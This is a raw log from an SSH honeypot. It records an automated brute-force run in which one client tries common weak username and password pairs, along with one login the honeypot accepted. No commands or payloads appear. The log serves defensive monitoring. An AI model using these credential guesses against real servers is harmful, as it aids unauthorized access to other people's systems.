{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.934551Z","src_ip":"212.227.125.160","session":"84e5e86a17af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57154,"dst_ip":"1.2.3.4","dst_port":22,"session":"a51ef5130cc9","protocol":"ssh","message":"New connection: 212.227.125.160:57154 (1.2.3.4:22) [session: a51ef5130cc9]","sensor":"my-vps","timestamp":"2025-08-31T07:07:08.976948Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.023084Z","src_ip":"212.227.125.160","session":"15520f6628e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57170,"dst_ip":"1.2.3.4","dst_port":22,"session":"588a615166cb","protocol":"ssh","message":"New connection: 212.227.125.160:57170 (1.2.3.4:22) [session: 588a615166cb]","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.077311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.129774Z","src_ip":"212.227.125.160","session":"a51ef5130cc9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.131054Z","src_ip":"212.227.125.160","session":"a51ef5130cc9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1","message":"login attempt [admin/1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.162772Z","src_ip":"212.227.125.160","session":"61a6f2a28ceb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.246086Z","src_ip":"212.227.125.160","session":"588a615166cb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.247498Z","src_ip":"212.227.125.160","session":"588a615166cb"}
{"eventid":"cowrie.login.success","username":"root","password":"grupo","message":"login attempt [root/grupo] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:07:09.763984Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1","message":"login attempt [pi/1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.186777Z","src_ip":"212.227.125.160","session":"a51ef5130cc9"}
{"eventid":"cowrie.login.failed","username":"student","password":"1qaz2wsx","message":"login attempt [student/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.239782Z","src_ip":"212.227.125.160","session":"588a615166cb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.259012Z","src_ip":"212.227.125.160","session":"61a6f2a28ceb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57178,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf0c6dd7ff3","protocol":"ssh","message":"New connection: 212.227.125.160:57178 (1.2.3.4:22) [session: 2cf0c6dd7ff3]","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.327629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.380973Z","src_ip":"212.227.125.160","session":"2cf0c6dd7ff3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.381941Z","src_ip":"212.227.125.160","session":"2cf0c6dd7ff3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qaz2wsx","message":"login attempt [admin/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:10.672689Z","src_ip":"212.227.125.160","session":"2cf0c6dd7ff3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.230571Z","src_ip":"212.227.125.160","session":"a51ef5130cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57186,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c79e2b9c544","protocol":"ssh","message":"New connection: 212.227.125.160:57186 (1.2.3.4:22) [session: 6c79e2b9c544]","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.272547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.273295Z","src_ip":"212.227.125.160","session":"6c79e2b9c544"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.283975Z","src_ip":"212.227.125.160","session":"588a615166cb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.316909Z","src_ip":"212.227.125.160","session":"6c79e2b9c544"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57196,"dst_ip":"1.2.3.4","dst_port":22,"session":"5415a08e7e78","protocol":"ssh","message":"New connection: 212.227.125.160:57196 (1.2.3.4:22) [session: 5415a08e7e78]","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.325666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.326407Z","src_ip":"212.227.125.160","session":"5415a08e7e78"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.368955Z","src_ip":"212.227.125.160","session":"5415a08e7e78"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1qaz2wsx","message":"login attempt [pi/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.445936Z","src_ip":"212.227.125.160","session":"6c79e2b9c544"}
{"eventid":"cowrie.login.failed","username":"student","password":"123456789","message":"login attempt [student/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.498234Z","src_ip":"212.227.125.160","session":"5415a08e7e78"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.716989Z","src_ip":"212.227.125.160","session":"2cf0c6dd7ff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57208,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9e79d57ddf","protocol":"ssh","message":"New connection: 212.227.125.160:57208 (1.2.3.4:22) [session: 0b9e79d57ddf]","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.758817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.759572Z","src_ip":"212.227.125.160","session":"0b9e79d57ddf"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.802787Z","src_ip":"212.227.125.160","session":"0b9e79d57ddf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:11.931364Z","src_ip":"212.227.125.160","session":"0b9e79d57ddf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.489524Z","src_ip":"212.227.125.160","session":"6c79e2b9c544"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57218,"dst_ip":"1.2.3.4","dst_port":22,"session":"e17ca006ee23","protocol":"ssh","message":"New connection: 212.227.125.160:57218 (1.2.3.4:22) [session: e17ca006ee23]","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.531480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.541059Z","src_ip":"212.227.125.160","session":"e17ca006ee23"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.541936Z","src_ip":"212.227.125.160","session":"5415a08e7e78"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.576288Z","src_ip":"212.227.125.160","session":"e17ca006ee23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57228,"dst_ip":"1.2.3.4","dst_port":22,"session":"6303db55efcc","protocol":"ssh","message":"New connection: 212.227.125.160:57228 (1.2.3.4:22) [session: 6303db55efcc]","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.583815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.587222Z","src_ip":"212.227.125.160","session":"6303db55efcc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.628480Z","src_ip":"212.227.125.160","session":"6303db55efcc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.779200Z","src_ip":"212.227.125.160","session":"e17ca006ee23"}
{"eventid":"cowrie.login.failed","username":"student","password":"123456","message":"login attempt [student/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.805143Z","src_ip":"212.227.125.160","session":"6303db55efcc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:12.978540Z","src_ip":"212.227.125.160","session":"0b9e79d57ddf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57238,"dst_ip":"1.2.3.4","dst_port":22,"session":"29e5a163caf7","protocol":"ssh","message":"New connection: 212.227.125.160:57238 (1.2.3.4:22) [session: 29e5a163caf7]","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.021480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.045628Z","src_ip":"212.227.125.160","session":"29e5a163caf7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.099512Z","src_ip":"212.227.125.160","session":"29e5a163caf7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.378356Z","src_ip":"212.227.125.160","session":"29e5a163caf7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.864832Z","src_ip":"212.227.125.160","session":"e17ca006ee23"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.900088Z","src_ip":"212.227.125.160","session":"6303db55efcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57248,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e8ea57bb37b","protocol":"ssh","message":"New connection: 212.227.125.160:57248 (1.2.3.4:22) [session: 3e8ea57bb37b]","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.915019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.961812Z","src_ip":"212.227.125.160","session":"3e8ea57bb37b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:13.962511Z","src_ip":"212.227.125.160","session":"3e8ea57bb37b"}
